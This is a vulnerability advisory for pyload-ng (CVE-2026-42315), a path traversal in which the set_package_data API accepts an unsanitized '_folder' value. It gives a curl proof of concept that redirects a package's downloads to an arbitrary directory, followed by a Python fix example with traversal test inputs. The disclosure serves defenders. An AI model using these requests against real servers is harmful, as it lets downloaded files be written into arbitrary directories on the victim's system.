PT-2026-37264 · Pypi · Pyload-Ng
Published 2026-05-05 · Updated 2026-05-05 · CVE-2026-42315
CVSS v3.1: 8.1 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Summary
No sanitization of the package folder name allows files to be written anywhere outside the intended download directory.
Affected Component
src/pyload/core/api/__init__.py - Function: set_package_data()
Details
When a folder name is passed to the set_package_data() API call inside the data object under the key "_folder", it is not sanitized at all, so a user holding Perms.MODIFY can set an arbitrary directory as the download location of a package.
PoC
- Create a package and note the package ID in the response, e.g. 5
  curl -X 'POST' \
    'http://localhost:8000/api/add_package' \
    -H 'accept: application/json' \
    -H 'X-API-Key: <valid api key>' \
    -H 'Content-Type: application/json' \
    -d '{
      "name": "set_package_data exploit poc",
      "links": [
        "http://example.com/file.txt"
      ],
      "dest": 1
    }'
- Call set_package_data for this package ID with an arbitrary directory
  curl -X 'POST' \
    'http://localhost:8000/api/set_package_data' \
    -H 'accept: */*' \
    -H 'X-API-Key: <valid api key>' \
    -H 'Content-Type: application/json' \
    -d '{
      "package_id": 5,
      "data": {
        "_folder": "/users/root/"
      }
    }'
- The new download folder is set without any checks
  curl -X 'GET' \
    'http://localhost:8000/api/get_queue' \
    -H 'accept: application/json' \
    -H 'X-API-Key: <valid api key>'
Response:
  [
    {
      "pid": 5,
      "name": "set_package_data exploit poc",
      "folder": "/users/root/",
      "site": "",
      "password": "",
      "dest": 1,
      "order": 1,
      "linksdone": 0,
      "sizedone": 0,
      "sizetotal": 0,
      "linkstotal": 1,
      "links": null,
      "fids": null
    }
  ]
Impact
Allows absolute path traversal: the package's downloaded files are written into an arbitrary directory, as long as the pyLoad process has write access to it.
Fix
Path traversal
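One way an API handler can enforce that a package folder stays inside the configured download directory, shown here as an added example rather than pyLoad's own code or fix. Two layers are illustrated: an allow-list of writable attributes, so that a private key such as "_folder" in the data object is refused instead of being set blindly, and a containment check that resolves the joined path (following symlinks) and rejects anything not under the download root, which covers the absolute "/users/root/" value from the PoC as well as "../" sequences and symlink escapes. The names resolve_package_folder, set_package_data_checked and ALLOWED_PACKAGE_FIELDS, the dict used as the package record and the download root location are assumptions for this example; the inputs in demo() are constructed.

```python
import os
import tempfile


class PackageFolderError(ValueError):
    """Raised when a requested package folder is not inside the download root."""


def resolve_package_folder(download_root: str, folder: str) -> str:
    """Return the absolute on-disk path for a package folder, or raise PackageFolderError.

    Rejects empty names, NUL bytes and absolute paths outright, then resolves the
    joined path (following symlinks) and checks that it still lies inside the
    resolved download root. Comparing real paths catches both "../" sequences
    and symlinks inside the download directory that point elsewhere.
    """
    if not folder:
        raise PackageFolderError("empty folder name")
    if "\x00" in folder:
        raise PackageFolderError("NUL byte in folder name")
    # os.path.join discards the root entirely when the second part is absolute,
    # which is exactly how a value like "/users/root/" wins without this check.
    if os.path.isabs(folder) or os.path.splitdrive(folder)[0]:
        raise PackageFolderError(f"absolute path not allowed: {folder!r}")
    root = os.path.realpath(download_root)
    candidate = os.path.realpath(os.path.join(root, folder))
    if os.path.commonpath([root, candidate]) != root:
        raise PackageFolderError(f"folder escapes download root: {folder!r}")
    return candidate


# Attributes a client may change through the API (assumed set for this example).
# Anything else, including private attributes such as "_folder", is refused.
ALLOWED_PACKAGE_FIELDS = frozenset({"name", "folder", "password", "site"})


def set_package_data_checked(package: dict, data: dict, download_root: str) -> dict:
    """Apply a client-supplied data dict to a package record (a plain dict here).

    Hypothetical stand-in for an API handler: unknown or private keys are
    rejected, and a new "folder" value must pass resolve_package_folder()
    before it is stored.
    """
    for key, value in data.items():
        if key not in ALLOWED_PACKAGE_FIELDS:
            raise PackageFolderError(f"attribute {key!r} is not writable through the API")
        if key == "folder":
            resolve_package_folder(download_root, value)
        package[key] = value
    return package


def demo() -> dict:
    """Run the checks against constructed inputs in a throwaway directory.

    Returns a map from case label to "ok" or "rejected" so the outcome can be
    inspected (or asserted on) rather than only printed.
    """
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "downloads")
        os.mkdir(root)
        # A symlink inside the download root that points outside it (constructed).
        os.symlink(tmp, os.path.join(root, "escape_link"))
        folder_cases = [
            "/users/root/",          # the PoC value: absolute path
            "../outside",            # relative traversal
            "sub/../../outside",     # traversal hidden in the middle
            "escape_link/victim",    # traversal through a symlink
            "my package",            # plain subfolder
            "season 1/episode 2",    # nested subfolder
        ]
        for folder in folder_cases:
            try:
                resolve_package_folder(root, folder)
                results[folder] = "ok"
            except PackageFolderError:
                results[folder] = "rejected"
        # The PoC payload against the handler: the private key is refused outright,
        # a public "folder" key still has to pass the containment check.
        package = {"pid": 5, "name": "demo", "folder": "demo"}
        for label, data in [
            ("data:_folder", {"_folder": "/users/root/"}),
            ("data:folder-abs", {"folder": "/users/root/"}),
            ("data:folder-rel", {"folder": "demo/new"}),
        ]:
            try:
                set_package_data_checked(dict(package), data, root)
                results[label] = "ok"
            except PackageFolderError:
                results[label] = "rejected"
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{outcome:8s} {case}")
```

The check deliberately runs on real paths rather than on the string: normalizing "../" away is not enough when a symlink inside the download directory already points outside it, and comparing with os.path.commonpath avoids the classic prefix mistake where "/srv/downloads-old" passes a startswith("/srv/downloads") test.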
Related Identifiers
Affected Products
Pyload-Ng